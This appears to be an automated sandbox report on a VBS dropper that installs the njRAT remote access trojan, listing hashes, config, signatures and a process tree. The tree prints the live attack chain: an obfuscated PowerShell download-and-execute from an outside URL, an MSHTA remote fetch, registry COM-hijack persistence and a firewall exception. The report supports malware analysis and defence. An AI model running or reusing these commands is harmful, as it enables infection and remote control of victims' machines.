Analysis

  • max time kernel
    144s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220722-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-08-2022 19:00

General

  • Target

    LIYDOERWQPOKERHAVAXOCI.vbs

  • Size

    1KB

  • MD5

    733afa01e2447e2fcafcf4f224a1a4a7

  • SHA1

    fcb94d8e29aa8bb802104a6ea49f7e715bea7031

  • SHA256

    00eb25d6c95f74f9c7caded04eca76fa2a03e280448af51c1108b75b2709909a

  • SHA512

    42658d2f4cbb0a75c49434644078ad5291995b415481186a66aad1fd31a3013002e6f753093f81c4d8022a7811b199e2b66270c4017a928f6bf9df72d0334948

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://tradeguru.com.pk/enc1

Extracted

Family

njrat

Version

1.9

Botnet

HacKed

Mutex

Microsoft.Exe

Attributes
  • reg_key

    Microsoft.Exe

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 3 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Registers COM server for autorun 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LIYDOERWQPOKERHAVAXOCI.vbs"
    1⤵
      PID:5088
    • C:\Windows\system32\MSHTA.EXE
      MSHTA.EXE https://tradeguru.com.pk/enc1
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      PID:4812
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
      POWERSHELL $HFTCVFLOZOSBOCVIDADWLIO = '[#])02!^#13_27<&{+}<&{@y#])02!^#13_27<&{+}<&{@t/##47)<+=%3#+^(*16!&@_\)&!_32%510#])\59(}}17.IO.#])02!^#13_27<&{+}<&{@t)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[\)&!_32%510#])\59(}}17)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[d/##47)<+=%3#+^(*16!&@_)[$76%=_)7%2/8\\5[#!@7]'.Replace('#])02!^#13_27<&{+}<&{@','S').Replace('/##47)<+=%3#+^(*16!&@_','E').Replace(')[$76%=_)7%2/8\\5[#!@7','R').Replace('/{0265}}78<0{&_<$&/3}[','A').Replace('\)&!_32%510#])\59(}}17','M');$HDSRYDZAWTNCWJSVNHKAAWK = ($HFTCVFLOZOSBOCVIDADWLIO -Join '')|&('I'+'EX');$HQNBVPIZRQRPUJTZLAHQUHN = '[2)%@85#]@9@4[_^}^=--4/y2)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@1@)2308@8<[+(\]9}\28_1m.N1@)2308@8<[+(\]9}\28_11{-9)%443833)4=724_<[email protected]@)2308@8<[+(\]9}\28_1bR1@)2308@8<[+(\]9}\28_1qu1@)2308@8<[+(\]9}\28_12)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@]'.Replace('2)%@85#]@9@4[_^}^=--4/','S').Replace('1@)2308@8<[+(\]9}\28_1','E').Replace('1{-9)%443833)4=724_<1@','T');$HJZPGAAEFSGITSRIZPKUQBS = ($HQNBVPIZRQRPUJTZLAHQUHN -Join '')|&('I'+'EX');$HDUYAYRATSZBQJRJZHWQLLX = '[&1\&@*}8\\)_8^[*1)6%\r4]{/3<*/\(-[_}}))}3{14a-=*6\]7}0^-/#54(0*90<04]{/3<*/\(-[_}}))}3{14'.Replace('[&1\&@*}8\\)_8^[*1)6%\','C').Replace('4]{/3<*/\(-[_}}))}3{14','E').Replace('-=*6\]7}0^-/#54(0*90<0','T');$HNIKFEBTGQHWZRRONHNVHCJ = '[}*_2/#{3_]143@]3_-3993=#_^2&^&=4$[-(8[8$&#3tR3=#_^2&^&=4$[-(8[8$&#32#127#^(&]1(=}8@$!9*56pon2#127#^(&]1(=}8@$!9*563=#_^2&^&=4$[-(8[8$&#3'.Replace('[}*_2/#{3_]143@]3_-399','G').Replace('3=#_^2&^&=4$[-(8[8$&#3','E').Replace('2#127#^(&]1(=}8@$!9*56','S');$HUDDTIGVYNHICUBUGQZNRZL = 'G#92-1^}48[/]&![(4+{289t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68pon]_7)0}{^)-]<+1)%[51\68#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289am'.Replace(']_7)0}{^)-]<+1)%[51\68','S').Replace('#92-1^}48[/]&![(4+{289','E').Replace('==58=<^5&7<_9/*&}0+&^1','R');$HNSNPLGHWJCBKWXNBDGSZHJ = '2}^0)91!45<5*!)-{[)40-][3\1([^@=-++0=$!8473[a_4@8]2&}\@=9\)7=8$%)-9To][3\1([^@=-++0=$!8473[n_4@8]2&}\@=9\)7=8$%)-9'.Replace('2}^0)91!45<5*!)-{[)40-','R').Replace('][3\1([^@=-++0=$!8473[','E').Replace('_4@8]2&}\@=9\)7=8$%)-9','D');&('I'+'EX')($HDSRYDZAWTNCWJSVNHKAAWK::new($HJZPGAAEFSGITSRIZPKUQBS::$HDUYAYRATSZBQJRJZHWQLLX('https://tradeguru.com.pk/Server1.txt').$HNIKFEBTGQHWZRRONHNVHCJ().$HUDDTIGVYNHICUBUGQZNRZL()).$HNSNPLGHWJCBKWXNBDGSZHJ())
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2316
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1'"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2392
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs"
          3⤵
            PID:2008
      • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
        POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat
        1⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2992
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3052
          • C:\Windows\system32\reg.exe
            REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
            3⤵
            • Modifies registry class
            • Modifies registry key
            PID:2376
          • C:\Windows\system32\reg.exe
            REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
            3⤵
            • Registers COM server for autorun
            • Modifies registry class
            • Modifies registry key
            PID:4468
          • C:\Windows\system32\cmd.exe
            cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4768
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'"
              4⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3520
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2380
                • C:\Windows\SysWOW64\netsh.exe
                  netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
                  6⤵
                  • Modifies Windows Firewall
                  PID:2456

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Defense Evasion

      Modify Registry

      1
      T1112

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1
        Filesize

        604KB

        MD5

        ab1fce3ab2f6f211da8f8dc30c2b3060

        SHA1

        ae0dff660b20f9209a66029d44b048a63cc80336

        SHA256

        7cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca

        SHA512

        ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85

      • C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat
        Filesize

        706B

        MD5

        1a7a326391b638c03d76369946fc0052

        SHA1

        7ae0ffd77ec76b94d735265efad35ddd072cdf36

        SHA256

        0223739ebea16b1f70bf88f3eb43afd01c315c1e7142a72bf8931bb6be9ea09f

        SHA512

        449ce3c15d2d36e42c00c9f9b1df759aa830de931532ee17d16ff6b50a8fe3d180ae474e2e8aca66e9af47df434293f3d96367dedaa91ad1ce60383fe23f9495

      • C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1
        Filesize

        3KB

        MD5

        89879c7e1b80b9171b57ec7290c50cf8

        SHA1

        4d2761deb7c46b99f5c8ebc4329f0ccd5b3aace3

        SHA256

        dc8f58abd89fed28b00f23da6657188e40dde2da65c254c12a38c4ed1984c6b2

        SHA512

        d8f579f01ddba32beb1cc578fd798b6e8790073261fdd71c4b5b0a277766a68833ca5834b006e9e9c3582f2476fa77b8019e98f744dafdf56f9e0239afe1dd3b

      • C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs
        Filesize

        1KB

        MD5

        77d9ab54d90a588d38b4a402d7cf25bb

        SHA1

        f72cf4ad3106815b8f3dc9ab804ae285b6bad1e6

        SHA256

        25f09c56e34e4a61e8e57e453c2a3ed05ff33b6e10f1d78af94301ddf312a9f4

        SHA512

        c2054a0e6df593a318fd310b82ed43cb8cf8f89b58bd784acd3ec5ca2a7b039f7fc2848a7641cc43215c0656ea71d3a09ed800d0164c293e5b54bbd27ffe21e6

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
        Filesize

        3KB

        MD5

        00e7da020005370a518c26d5deb40691

        SHA1

        389b34fdb01997f1de74a5a2be0ff656280c0432

        SHA256

        a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

        SHA512

        9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        51aa87521f685fa8d4f4bdbd7684a350

        SHA1

        fd4027d9b24c41461525b0f3f764aa6b2ddd5803

        SHA256

        6e9453d9cff64f88f0a0b0b5cda807f7deac354120724137e7426871401ea0d6

        SHA512

        637f0b4c94abb0bcf0bbf21ec2d328eccbf1bd6a37c5dbd309cd428f5aaab08d0f6102a8f45c09372fba57c034fc88ed7950c9afe366583cd5f636ee0b974947

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        171c8388c36c7ff24bff6d83366bcbd6

        SHA1

        b457641f8c88a56590921ce729d3111a8964107a

        SHA256

        cbb779c4ad16523953107fa4344f29750fd398216b1769ad9476c43ebe919621

        SHA512

        94889b43df68c6fd761e946a220a7deea68318d9685ffe6c42926e647bbf1f3ef650a1c7dc7e7ffe66e4f02c97a32d4105502c9c8835e14795dcd85088b60e99

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        235a8eb126d835efb2e253459ab8b089

        SHA1

        293fbf68e6726a5a230c3a42624c01899e35a89f

        SHA256

        5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

        SHA512

        a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

      • memory/2008-139-0x0000000000000000-mapping.dmp
      • memory/2316-134-0x00007FFB07940000-0x00007FFB08401000-memory.dmp
        Filesize

        10.8MB

      • memory/2316-133-0x0000021EFFC20000-0x0000021EFFC42000-memory.dmp
        Filesize

        136KB

      • memory/2316-135-0x00007FFB07940000-0x00007FFB08401000-memory.dmp
        Filesize

        10.8MB

      • memory/2316-153-0x00007FFB07940000-0x00007FFB08401000-memory.dmp
        Filesize

        10.8MB

      • memory/2376-143-0x0000000000000000-mapping.dmp
      • memory/2380-154-0x0000000000400000-0x0000000000410000-memory.dmp
        Filesize

        64KB

      • memory/2380-165-0x0000000006010000-0x000000000601A000-memory.dmp
        Filesize

        40KB

      • memory/2380-164-0x0000000006650000-0x00000000066B6000-memory.dmp
        Filesize

        408KB

      • memory/2380-161-0x00000000060A0000-0x0000000006644000-memory.dmp
        Filesize

        5.6MB

      • memory/2380-162-0x0000000005AF0000-0x0000000005B82000-memory.dmp
        Filesize

        584KB

      • memory/2380-160-0x0000000005990000-0x0000000005A2C000-memory.dmp
        Filesize

        624KB

      • memory/2380-155-0x000000000040BBBE-mapping.dmp
      • memory/2392-150-0x00007FFB07940000-0x00007FFB08401000-memory.dmp
        Filesize

        10.8MB

      • memory/2392-136-0x0000000000000000-mapping.dmp
      • memory/2392-137-0x00007FFB07940000-0x00007FFB08401000-memory.dmp
        Filesize

        10.8MB

      • memory/2456-163-0x0000000000000000-mapping.dmp
      • memory/2992-147-0x00007FFB07940000-0x00007FFB08401000-memory.dmp
        Filesize

        10.8MB

      • memory/2992-159-0x00007FFB07940000-0x00007FFB08401000-memory.dmp
        Filesize

        10.8MB

      • memory/3052-141-0x0000000000000000-mapping.dmp
      • memory/3520-157-0x00007FFB07940000-0x00007FFB08401000-memory.dmp
        Filesize

        10.8MB

      • memory/3520-148-0x00007FFB07940000-0x00007FFB08401000-memory.dmp
        Filesize

        10.8MB

      • memory/3520-146-0x0000000000000000-mapping.dmp
      • memory/4468-144-0x0000000000000000-mapping.dmp
      • memory/4768-145-0x0000000000000000-mapping.dmp